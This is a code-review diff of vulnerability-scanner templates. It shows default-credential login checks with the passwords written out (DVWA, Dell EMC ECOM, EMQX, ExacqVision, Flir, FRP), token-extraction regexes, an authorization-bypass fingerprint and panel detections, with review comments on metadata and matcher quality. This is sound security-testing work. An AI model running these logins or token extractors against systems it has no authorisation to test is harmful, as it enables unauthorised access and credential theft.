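Review bot: In dvwa-default-login-7129.yaml the hunk removes the `description`, the `reference` and `classification: cwe-id: CWE-798`, leaving a `severity: critical` finding with nothing telling the reader that DVWA is a deliberately vulnerable training application. I would keep the description and the CWE so a triager can see why the finding is rated as it is and whether the host is expected lab equipment. emcecom-default-login-7212.yaml gets the same treatment further down, losing its `remediation` text and CWE-798 classification.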
diff --git a/poc/auth/dvwa-default-login-7127.yaml b/poc/auth/dvwa-default-login.yaml similarity index 100% rename from poc/auth/dvwa-default-login-7127.yaml rename to poc/auth/dvwa-default-login.yaml diff --git a/poc/auth/dvwa-headless-automatic-login-7130.yaml b/poc/auth/dvwa-headless-automatic-login-7130.yaml deleted file mode 100644 index cb7db2b51c..0000000000 --- a/poc/auth/dvwa-headless-automatic-login-7130.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: dvwa-headless-automatic-login -info: - name: DVWA Headless Automatic Login - author: pdteam - severity: high - tags: headless -headless: - - steps: - - args: - url: "{{BaseURL}}/login.php" - action: navigate - - action: waitload - - args: - by: x - xpath: /html/body/div/div[2]/form/fieldset/input - action: click - - action: waitload - - args: - by: x - value: admin - xpath: /html/body/div/div[2]/form/fieldset/input - action: text - - args: - by: x - xpath: /html/body/div/div[2]/form/fieldset/input[2] - action: click - - action: waitload - - args: - by: x - value: password - xpath: /html/body/div/div[2]/form/fieldset/input[2] - action: text - - args: - by: x - xpath: /html/body/div/div[2]/form/fieldset/p/input - action: click - - action: waitload - matchers: - - part: resp - type: word - words: - - "You have logged in as" diff --git a/poc/auth/dvwa-headless-automatic-login-7131.yaml b/poc/auth/dvwa-headless-automatic-login-7131.yaml new file mode 100644 index 0000000000..a2e8ccd0c2 --- /dev/null +++ b/poc/auth/dvwa-headless-automatic-login-7131.yaml 
@@ -0,0 +1,42 @@ +id: dvwa-headless-automatic-login +info: + name: DVWA Headless Automatic Login + author: pdteam + severity: high + tags: headless,dvwa +headless: + - steps: + - args: + url: "{{BaseURL}}/login.php" + action: navigate + - action: waitload + - args: + by: x + xpath: /html/body/div/div[2]/form/fieldset/input + action: click + - action: waitload + - args: + by: x + value: admin + xpath: /html/body/div/div[2]/form/fieldset/input + action: text + - args: + by: x + xpath: /html/body/div/div[2]/form/fieldset/input[2] + action: click + - action: waitload + - args: + by: x + value: password + xpath: /html/body/div/div[2]/form/fieldset/input[2] + action: text + - args: + by: x + xpath: /html/body/div/div[2]/form/fieldset/p/input + action: click + - action: waitload + matchers: + - part: resp + type: word + words: + - "You have logged in as" diff --git a/poc/auth/dvwa-headless-automatic-login-7133.yaml b/poc/auth/dvwa-headless-automatic-login-7133.yaml index a2e8ccd0c2..bd48c62f5e 100644 --- a/poc/auth/dvwa-headless-automatic-login-7133.yaml +++ b/poc/auth/dvwa-headless-automatic-login-7133.yaml @@ -1,9 +1,11 @@ id: dvwa-headless-automatic-login + info: name: DVWA Headless Automatic Login author: pdteam severity: high tags: headless,dvwa + headless: - steps: - args: @@ -35,8 +37,15 @@ headless: xpath: /html/body/div/div[2]/form/fieldset/p/input action: click - action: waitload + + matchers-condition: or matchers: - part: resp type: word words: - "You have logged in as" + + - part: resp + type: word + words: + - "First time using DVWA" diff --git a/poc/auth/dynatrace-token-7145.yaml b/poc/auth/dynatrace-token-7145.yaml new file mode 100644 index 0000000000..3fe0f4cf8f --- /dev/null +++ b/poc/auth/dynatrace-token-7145.yaml 
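Review bot: With `matchers-condition: or` in dvwa-headless-automatic-login-7133.yaml, the new `"First time using DVWA"` matcher makes the template fire on what, going by the string, is a first-run notice rather than a post-login page, yet the result is still reported as "DVWA Headless Automatic Login" at `severity: high`. Giving the two matchers names, for example `name: logged-in` and `name: first-time-setup`, would let the output show which condition was met. The login steps rely on absolute XPaths such as `/html/body/div/div[2]/form/fieldset/input`, so a short comment stating which page layout they were written against would help whoever has to repair them.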
@@ -0,0 +1,13 @@
+id: dynatrace-token
+info:
+ name: Dynatrace Token
+ author: gaurang
+ severity: high
+ tags: token,file
+file:
+ - extensions:
+ - all
+ extractors:
+ - type: regex
+ regex:
+ - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}"
diff --git a/poc/auth/dynatrace-token-7146.yaml b/poc/auth/dynatrace-token-7146.yaml
deleted file mode 100644
index 3ad533dd3f..0000000000
--- a/poc/auth/dynatrace-token-7146.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: dynatrace-token
-
-info:
- name: Dynatrace Token
- author: gaurang
- severity: high
- tags: token,file
-
-file:
- - extensions:
- - all
-
- extractors:
- - type: regex
- regex:
- - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}"
\ No newline at end of file
diff --git a/poc/auth/emcecom-default-login-7211.yaml b/poc/auth/emcecom-default-login-7211.yaml
deleted file mode 100644
index 1ad75f5e1f..0000000000
--- a/poc/auth/emcecom-default-login-7211.yaml
+++ /dev/null
@@ -1,43 +0,0 @@
-id: dell-emc-ecom-default-login
-
-info:
- name: Dell EMC ECOM Default Login
- author: Techryptic (@Tech)
- severity: high
- description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered.
- remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP.
- reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
- tags: dell,emc,ecom,default-login
- classification:
- cwe-id: CWE-798
-
-requests:
- - raw:
- - |
- GET / HTTP/1.1
- Host: {{Hostname}}
- Authorization: Basic {{base64(username + ':' + password)}}
-
- payloads:
- username:
- - root
- password:
- - calvin
- attack: pitchfork
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Set-Cookie: ECOMSecurity"
- part: header
-
- - type: word
- words:
- - "Welcome to ECOM"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/03/03
diff --git a/poc/auth/emcecom-default-login-7212.yaml b/poc/auth/emcecom-default-login-7212.yaml
index 199ac75ebe..ce86884996 100644
--- a/poc/auth/emcecom-default-login-7212.yaml
+++ b/poc/auth/emcecom-default-login-7212.yaml
@@ -3,12 +3,9 @@ info: name: Dell EMC ECOM Default Login author: Techryptic (@Tech) severity: high - description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered. - remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP. + description: Default Login of admin:#1Password on Dell EMC ECOM application. reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation tags: dell,emc,ecom,default-login - classification: - cwe-id: CWE-798 requests: - raw: - | @@ -33,5 +30,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/emqx-default-login-7222.yaml b/poc/auth/emqx-default-login-7222.yaml new file mode 100644 index 0000000000..9185a5cdd3 --- /dev/null +++ b/poc/auth/emqx-default-login-7222.yaml @@ -0,0 +1,35 @@ +id: emqx-default-login +info: + name: Emqx Default Admin Login + author: For3stCo1d + severity: high + description: Emqx default admin credentials were discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: http.favicon.hash:"-670975485" + tags: emqx,default-login +requests: + - raw: + - | + POST /api/v4/auth HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + {"username":"{{user}}","password":"{{pass}}"} + attack: pitchfork + payloads: + user: + - admin + pass: + - public + matchers: + - type: dsl + dsl: + - body == "{\"code\":0}" + - status_code == 200 + condition: and + +# Enhanced by mp on 2022/03/28 
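Review bot: The raw request in emqx-default-login-7222.yaml declares `Content-Type: application/x-www-form-urlencoded` but sends a JSON body, `{"username":"{{user}}","password":"{{pass}}"}`. If the endpoint parses by content type, the login is rejected regardless of the credentials and the check silently misses exposed brokers; `Content-Type: application/json` matches the body. The `dsl` matcher also compares `body == "{\"code\":0}"` exactly, so any extra field or whitespace in the response would cause a miss, and `contains(body, "\"code\":0")` is more tolerant.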
diff --git a/poc/auth/emqx-default-login.yaml b/poc/auth/emqx-default-login.yaml index 9185a5cdd3..792fb8c64b 100644 --- a/poc/auth/emqx-default-login.yaml +++ b/poc/auth/emqx-default-login.yaml @@ -4,12 +4,13 @@ info: author: For3stCo1d severity: high description: Emqx default admin credentials were discovered. + metadata: + shodan-query: 'http.favicon.hash:"-670975485"' classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - shodan-query: http.favicon.hash:"-670975485" tags: emqx,default-login requests: - raw: diff --git a/poc/auth/ems-login-panel-7223.yaml b/poc/auth/ems-login-panel-7223.yaml deleted file mode 100644 index a829cccc20..0000000000 --- a/poc/auth/ems-login-panel-7223.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: ems-login-panel -info: - name: EMS Login page detection - author: __Fazal - severity: info - tags: panel,ems,login -requests: - - method: GET - path: - - '{{BaseURL}}/EMSWebClient/Login.aspx' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "EMS Web Client - Login" diff --git a/poc/auth/enable-secret-for-password-user-and-.yaml b/poc/auth/enable-secret-for-password-user-and-.yaml index 3311fd4078..f178b8c71d 100644 --- a/poc/auth/enable-secret-for-password-user-and-.yaml +++ b/poc/auth/enable-secret-for-password-user-and-.yaml @@ -9,7 +9,6 @@ info: reference: - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/service_timestamps.htm tags: cisco,config-audit,cisco-switch,file,router - file: - extensions: - conf 
@@ -24,4 +23,5 @@ file: - type: word words: - "configure terminal" -# digest: 4a0a00473045022100dac4f6aa319499a727b4ee08faa1fe35473c0e8c1c5ec166d3b5ef62f267800c0220547bd47bb206453c355eabcd9eb490c10ff6d4f02f10029b954d0d4befffaef0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204f6beffea112852a6e7dbf11a7fd8fe97da58385e475b5d3485a12678568107f022100afe3edd05b216cb7a94d9080430e939c95b36d13f0195516681a1e2b31874aec:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/epmp-login-7229.yaml b/poc/auth/epmp-login-7229.yaml index d8a3b800ba..faccd694fc 100644 --- a/poc/auth/epmp-login-7229.yaml +++ b/poc/auth/epmp-login-7229.yaml @@ -4,8 +4,7 @@ info: name: ePMP 2000 Login author: dhiyaneshDk severity: info - reference: - - https://www.exploit-db.com/ghdb/6826 + reference: https://www.exploit-db.com/ghdb/6826 tags: iot,panel requests: diff --git a/poc/auth/epmp-login.yaml b/poc/auth/epmp-login.yaml deleted file mode 100644 index faccd694fc..0000000000 --- a/poc/auth/epmp-login.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: epmp-login - -info: - name: ePMP 2000 Login - author: dhiyaneshDk - severity: info - reference: https://www.exploit-db.com/ghdb/6826 - tags: iot,panel - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'ePMP' - part: body - - - type: status - status: - - 200 diff --git a/poc/auth/etcd-keys-7261.yaml b/poc/auth/etcd-keys-7261.yaml deleted file mode 100644 index af038ce2b3..0000000000 --- a/poc/auth/etcd-keys-7261.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: etcd-keys -info: - name: Etcd Keys - author: sharath - severity: info - description: Scans for etcd keys - tags: tech,k8s,kubernetes,devops,etcd - -requests: - - method: GET - path: - - "{{BaseURL}}/v2/keys/" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"node":' - - '"key":' - condition: and \ No newline at end of file 
diff --git a/poc/auth/etcd-keys-7262.yaml b/poc/auth/etcd-keys-7262.yaml deleted file mode 100644 index b28510d4e7..0000000000 --- a/poc/auth/etcd-keys-7262.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: etcd-keys - -info: - name: Etcd Keys - author: sharath - severity: info - description: Scans for etcd keys - tags: tech,k8s,kubernetes,devops,etcd - -requests: - - method: GET - path: - - "{{BaseURL}}/v2/keys/" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"node":' - - '"key":' - condition: and \ No newline at end of file diff --git a/poc/auth/etcd-keys.yaml b/poc/auth/etcd-keys.yaml index f96e70795c..b28510d4e7 100644 --- a/poc/auth/etcd-keys.yaml +++ b/poc/auth/etcd-keys.yaml @@ -1,22 +1,26 @@ id: etcd-keys + info: name: Etcd Keys author: sharath severity: info description: Scans for etcd keys tags: tech,k8s,kubernetes,devops,etcd + requests: - method: GET path: - "{{BaseURL}}/v2/keys/" + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: - '"node":' - '"key":' - condition: and + condition: and \ No newline at end of file diff --git a/poc/auth/etcd-unauthenticated-api.yaml b/poc/auth/etcd-unauthenticated-api.yaml index b41d5c896c..1c523c0a06 100644 --- a/poc/auth/etcd-unauthenticated-api.yaml +++ b/poc/auth/etcd-unauthenticated-api.yaml 
@@ -1,40 +1,28 @@ id: http-etcd-unauthenticated-api-data-leak - info: name: etcd Unauthenticated HTTP API Leak author: dhiyaneshDk severity: high - reference: - - https://hackerone.com/reports/1088429 - metadata: - max-request: 1 - tags: misconfig,hackerone,unauth,etcd - -http: + reference: https://hackerone.com/reports/1088429 + tags: unauth +requests: - method: GET path: - "{{BaseURL}}/v2/auth/roles" - matchers-condition: and matchers: - type: word - part: body words: - '"roles"' - '"permissions"' - '"role"' - '"kv"' condition: and - + part: body + - type: status + status: + - 200 - type: word part: header words: - "text/plain" - - "application/json" - condition: or - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100897d3dde5e9a2dfd0ab7d17ab781c555d44ad28bc754236ec6bf33a7ec4c0d7c022100f5ba5418fa82fa65ff1d95bedc9dffea5b1861016c575cc71e7898fbd6c8a3ea:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/exacqvision-default-login-7275.yaml b/poc/auth/exacqvision-default-login-7275.yaml index a553507ff3..872006f74d 100644 --- a/poc/auth/exacqvision-default-login-7275.yaml +++ b/poc/auth/exacqvision-default-login-7275.yaml @@ -1,19 +1,14 @@ id: exacqvision-default-login - info: name: ExacqVision Default Login author: ELSFA7110 severity: high description: ExacqVision Web Service default login credentials (admin/admin256) were discovered. - reference: - - https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf + tags: exacqvision,default-login + reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf classification: cwe-id: cwe-798 - metadata: - max-request: 1 - tags: exacqvision,default-login - -http: +requests: - raw: - | POST /service.web HTTP/1.1 
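Review bot: In etcd-unauthenticated-api.yaml the header matcher is narrowed from `text/plain` or `application/json` to `text/plain` alone, so under `matchers-condition: and` an endpoint that answers `/v2/auth/roles` with a JSON content type no longer matches and an open auth API goes unreported. I would keep `- "application/json"` together with `condition: or` on that matcher. The tags also shrink from `misconfig,hackerone,unauth,etcd` to `unauth`, which takes the template out of tag-based runs that select `etcd` or `misconfig`.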
@@ -22,25 +17,21 @@ http: Connection: close action=login&u={{username}}&p={{password}} - payloads: username: - admin password: - admin256 attack: pitchfork - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: header words: - "application/json" - - type: word part: body condition: and @@ -48,4 +39,4 @@ http: - '"auth":' - '"success": true' -# digest: 490a00463044022038ccb4009e1ac3a0d2c62ec1b183d9bc9c4a35bf19c1f2a4389a971af982cdd10220143d0e3a6e638cdcc1a026cf2f357281a6c9cd659111ac7caa19f080f9fe3eac:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/exacqvision-default-login-7277.yaml b/poc/auth/exacqvision-default-login.yaml similarity index 100% rename from poc/auth/exacqvision-default-login-7277.yaml rename to poc/auth/exacqvision-default-login.yaml diff --git a/poc/auth/faraday-login-7395.yaml b/poc/auth/faraday-login-7395.yaml deleted file mode 100644 index 14e0f98189..0000000000 --- a/poc/auth/faraday-login-7395.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: faraday-login - -info: - name: Faraday Login - author: dhiyaneshDK - severity: info - reference: - - https://www.shodan.io/search?query=html%3A%22faradayApp%22 - tags: panel,faraday - -requests: - - method: GET - path: - - '{{BaseURL}}/#/login' - - matchers-condition: and - matchers: - - type: word - words: - - 'ng-app="faradayApp">' - - - type: status - status: - - 200 diff --git a/poc/auth/faraday-login-7397.yaml b/poc/auth/faraday-login-7397.yaml deleted file mode 100644 index 0fe797e43d..0000000000 --- a/poc/auth/faraday-login-7397.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: faraday-login -info: - name: Faraday Login - author: dhiyaneshDK - severity: info - reference: - - https://www.shodan.io/search?query=html%3A%22faradayApp%22 - tags: panel,faraday -requests: - - method: GET - path: - - '{{BaseURL}}/#/login' - matchers-condition: and - matchers: - - type: word - words: - - 'ng-app="faradayApp">' - - type: status - status: - - 200 
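Review bot: The trailing `# digest:` line of exacqvision-default-login-7275.yaml is replaced by `# Enhanced by mp on 2022/03/03`. The same line is dropped from etcd-unauthenticated-api.yaml, fcm-server-key.yaml, fireware-xtm-user-authentication.yaml, frp-default-login-7557.yaml, fuelcms-default-login-7572.yaml, general-tokens-7583.yaml, glpi-default-login-7732.yaml and google-api-key-7768.yaml. That line appears to be the upstream signature over the template body, so after this sync these files can no longer be verified against the signer and would load as unsigned. If the older bodies are intended, record their origin in a comment such as `# synced from UPSTREAM_COMMIT_PLACEHOLDER, unsigned`; otherwise keep the signed upstream copy byte-for-byte.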
diff --git a/poc/auth/fatpipe-auth-bypass-7431.yaml b/poc/auth/fatpipe-auth-bypass-7431.yaml new file mode 100644 index 0000000000..50a5f2a66b --- /dev/null +++ b/poc/auth/fatpipe-auth-bypass-7431.yaml @@ -0,0 +1,42 @@ +id: fatpipe-auth-bypass + +info: + name: FatPipe WARP 10.2.2 - Authorization Bypass + author: gy741 + severity: high + description: FatPipe WARP 10.2.2 contains an authorization bypass vulnerability. Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result, an attacker can bypass proper authorization and access resources behind protected pages. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php + - https://www.fatpipeinc.com/support/advisories.php + metadata: + max-request: 1 + tags: fatpipe,auth-bypass,router + +http: + - raw: + - | + GET /fpui/jsp/index.jsp HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "productType" + - "type:" + - "version:" + - "FatPipe Networks" + condition: and + + extractors: + - type: regex + part: body + regex: + - 'version: "([0-9.a-z]+)"' + +# digest: 4a0a00473045022100d1edc48e65ce1c70eb9bace16c5bcd95326c7db7e6e46ce8d3dd077774c7b5b6022051350553635bcf5ed8bd71299dc6e198acde0bf60a878b29c8e1ba5e21a30866:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/fatpipe-auth-bypass.yaml b/poc/auth/fatpipe-auth-bypass.yaml deleted file mode 100644 index 01f8c435f9..0000000000 --- a/poc/auth/fatpipe-auth-bypass.yaml +++ /dev/null 
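Review bot: The matchers in fatpipe-auth-bypass-7431.yaml only establish that `/fpui/jsp/index.jsp` answers 200 with the product banner strings. Nothing compares the extracted `version:` value with the 10.2.2 release named in `name:`. At `severity: high` this reports every reachable FatPipe UI that serves the page, assuming fixed builds still render it, which the template cannot tell. State the limitation in the description, e.g. `Match is a fingerprint of the index page; confirm the extracted version against the vendor advisory before triage.`, or rate it `info` until a version comparison is added.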
@@ -1,33 +0,0 @@ -id: fatpipe-auth-bypass -info: - name: FatPipe Networks WARP 10.2.2 Authorization Bypass - author: gy741 - severity: high - description: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. - reference: - - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php - - https://www.fatpipeinc.com/support/advisories.php - tags: fatpipe,auth-bypass,router -requests: - - raw: - - | - GET /fpui/jsp/index.jsp HTTP/1.1 - Host: {{Hostname}} - Accept: */* - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "productType" - - "type:" - - "version:" - - "FatPipe Networks" - condition: and - extractors: - - type: regex - part: body - regex: - - 'version: "([0-9.a-z]+)"' diff --git a/poc/auth/fcm-server-key.yaml b/poc/auth/fcm-server-key.yaml index f6bd187a36..e97903cc84 100644 --- a/poc/auth/fcm-server-key.yaml +++ b/poc/auth/fcm-server-key.yaml @@ -1,24 +1,16 @@ id: fcm-server-key - info: name: FCM Server Key - author: absshax + author: Abss (@absshax) severity: high - reference: - - https://abss.me/posts/fcm-takeover - metadata: - max-request: 1 tags: exposure,token,google - -http: + reference: https://abss.me/posts/fcm-takeover +requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body regex: - "AAAA[a-zA-Z0-9_-]{7}:[a-zA-Z0-9_-]{140}" - -# digest: 4a0a00473045022100b41bb0ec98e486a4c7fd946999c22c3cb30362c9107cf13d9d316e8c5928c89d02207435889383de319947eb4cdfb163f9e236927f766534c57020d12e198e175c5d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/fireware-xtm-user-authentication.yaml b/poc/auth/fireware-xtm-user-authentication.yaml index d38f4f8713..89c8b1d11b 100644 --- a/poc/auth/fireware-xtm-user-authentication.yaml +++ b/poc/auth/fireware-xtm-user-authentication.yaml 
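Review bot: fcm-server-key.yaml is rated `severity: high` but has no `description:` and no matcher, only a body regex on `{{BaseURL}}`. A finding therefore gives the triager no statement of impact or of the expected remediation. Add a line such as `description: A Firebase Cloud Messaging server key is present in the page body; server keys must stay server-side, so rotate the key and remove it from client-delivered content.`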
@@ -1,20 +1,14 @@ id: fireware-xtm-user-authentication info: - name: Fireware XTM Login Panel - Detect + name: Fireware XTM User Authentication author: dhiyaneshDK severity: info - description: Fireware XTM login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 metadata: - max-request: 1 shodan-query: http.title:"Fireware XTM User Authentication" tags: panel -http: +requests: - method: GET path: - '{{BaseURL}}/sslvpn_logon.shtml' @@ -24,9 +18,6 @@ http: - type: word words: - 'User Authentication' - - type: status status: - 200 - -# digest: 4a0a00473045022100d044b71381575b0b34791247fdb14bbe286b152c3346e804a337446d48aa30620220169956313aa7d47b9f71ddfd6da3b5c07f63e1969868ee97bb8d5fedda86431f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/flir-default-login-7514.yaml b/poc/auth/flir-default-login-7514.yaml deleted file mode 100644 index b1c90be110..0000000000 --- a/poc/auth/flir-default-login-7514.yaml +++ /dev/null 
@@ -1,50 +0,0 @@ -id: flir-default-login - -info: - name: Flir Default Login - author: pikpikcu - severity: medium - description: Flir default login credentials (admin/admin) were discovered. - reference: - - https://securitycamcenter.com/flir-default-password/ - classification: - cwe-id: CWE-798 - metadata: - max-request: 1 - tags: default-login,flir,camera,iot - -http: - - raw: - - | - POST /login/dologin HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - user_name={{username}}&user_password={{password}} - - payloads: - username: - - admin - password: - - admin - attack: pitchfork - - matchers-condition: and - matchers: - - type: word - words: - - '"success"' - - - type: dsl - dsl: - - contains(tolower(header), 'text/html') - - contains(tolower(header), 'phpsessid') - - contains(tolower(header), 'showcameraid') - condition: and - - - type: status - status: - - 200 - -# digest: 4a0a00473045022011a29aa237bdcac2c00b8913d9f129c277697aae09bc972746e09267fe6b16be022100b473d730465a7034cfb0baf995f39d559a2ec037cc569d50afb7893b744c090d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/flir-default-login.yaml b/poc/auth/flir-default-login.yaml new file mode 100644 index 0000000000..c98ccc6f1c --- /dev/null +++ b/poc/auth/flir-default-login.yaml 
@@ -0,0 +1,35 @@ +id: flir-default-login +info: + name: Flir Default Login + author: pikpikcu + severity: medium + tags: default-login,flir,camera,iot +requests: + - raw: + - | + POST /login/dologin HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + user_name={{username}}&user_password={{password}} + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers-condition: and + matchers: + - type: word + words: + - '"success"' + - type: dsl + dsl: + - contains(tolower(all_headers), 'text/html') + - contains(tolower(all_headers), 'phpsessid') + - contains(tolower(all_headers), 'showcameraid') + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/frp-default-login-7556.yaml b/poc/auth/frp-default-login-7556.yaml deleted file mode 100644 index 0402c27460..0000000000 --- a/poc/auth/frp-default-login-7556.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: frp-default-login - -info: - name: FRP Default Login - author: pikpikcu - severity: high - description: FRP default login credentials were discovered. - tags: frp,default-login - reference: https://github.com/fatedier/frp/issues/1840 - classification: - cwe-id: CWE-798 - -requests: - - raw: - - | - GET /api/proxy/tcp HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - - payloads: - username: - - admin - password: - - admin - attack: pitchfork - - matchers-condition: and - matchers: - - - type: word - words: - - "proxies" - part: body - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/frp-default-login-7557.yaml b/poc/auth/frp-default-login-7557.yaml index b6c3bc4c4c..06ef7757f7 100644 --- a/poc/auth/frp-default-login-7557.yaml +++ b/poc/auth/frp-default-login-7557.yaml 
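Review bot: The new flir-default-login.yaml omits the `description`, `reference` and `classification: cwe-id: CWE-798` fields that the deleted flir-default-login-7514.yaml carried. The finding no longer states which credentials matched (admin/admin) or how it maps to CWE-798, so restore those three fields. The DSL matcher also reads `all_headers` where the deleted copy read `header`. Confirm that the engine version in use still populates `all_headers`; if it does not, the `and` condition can never be satisfied and the check silently stops reporting.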
@@ -1,42 +1,29 @@ id: frp-default-login - info: - name: FRP Default Login + name: Frp Default Login author: pikpikcu severity: high - description: FRP default login credentials were discovered. - reference: - - https://github.com/fatedier/frp/issues/1840 - classification: - cwe-id: CWE-798 - metadata: - max-request: 1 tags: frp,default-login - -http: + reference: https://github.com/fatedier/frp/issues/1840 +requests: - raw: - | GET /api/proxy/tcp HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} - payloads: username: - admin password: - admin attack: pitchfork - matchers-condition: and matchers: - type: word words: - - '"proxies":' + - "proxies" part: body condition: and - - type: status status: - 200 - -# digest: 4b0a00483046022100f6c07cdc03b58a288d1b0880547f64dbb95efc59706c3330afad7ec8cadaefe0022100cc3bcfa435537eb46fbbe86ec43729e1c763f2f69f7c893febc224ee9fac0aad:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ftp-credentials-exposure-7568.yaml b/poc/auth/ftp-credentials-exposure-7568.yaml deleted file mode 100644 index d2f9e9e052..0000000000 --- a/poc/auth/ftp-credentials-exposure-7568.yaml +++ /dev/null 
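Review bot: The body matcher in frp-default-login-7557.yaml is loosened from the JSON key `'"proxies":'` to the bare word `"proxies"`. Any 200 response to `/api/proxy/tcp` whose body mentions that word, such as a catch-all HTML page, is then reported as a working admin/admin login at `severity: high`. Keep the stricter form `- '"proxies":'`. The hunk also removes `description` and `classification: cwe-id: CWE-798`, which are what lets a report group this with the other default-credential findings.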
@@ -1,37 +0,0 @@ -id: ftp-credentials-exposure - -info: - name: FTP Credentials Exposure - author: pikpikcu - severity: high - description: FTP credentials were detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-200 - metadata: - verified: true - max-request: 1 - google-query: inurl:"/ftpsync.settings" - tags: config,ftp,exposure - -http: - - method: GET - path: - - "{{BaseURL}}/ftpsync.settings" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "FTPSync" - - "overwrite_newer_prevention" - - "default_folder_permissions" - condition: and - - - type: status - status: - - 200 - -# digest: 4a0a0047304502201e28c911f8fabf5fe779e079a838becaff04cf7d4f09b371d3531ae4439668ed022100d6c19923331e37144d1f4e0a89f37af21050a0d4a6a925016646f72bac506cf6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ftp-credentials-exposure.yaml b/poc/auth/ftp-credentials-exposure.yaml new file mode 100644 index 0000000000..a0650c5bb3 --- /dev/null +++ b/poc/auth/ftp-credentials-exposure.yaml @@ -0,0 +1,22 @@ +id: ftp-credentials-exposure +info: + name: FTP credentials exposure + author: pikpikcu + severity: medium + tags: config,ftp,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/ftpsync.settings" + matchers-condition: and + matchers: + - type: word + words: + - FTPSync + - overwrite_newer_prevention + - default_folder_permissions + part: body + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/ftp-weak-credentials-7570.yaml b/poc/auth/ftp-weak-credentials-7570.yaml deleted file mode 100644 index b93671d3bb..0000000000 --- a/poc/auth/ftp-weak-credentials-7570.yaml +++ /dev/null 
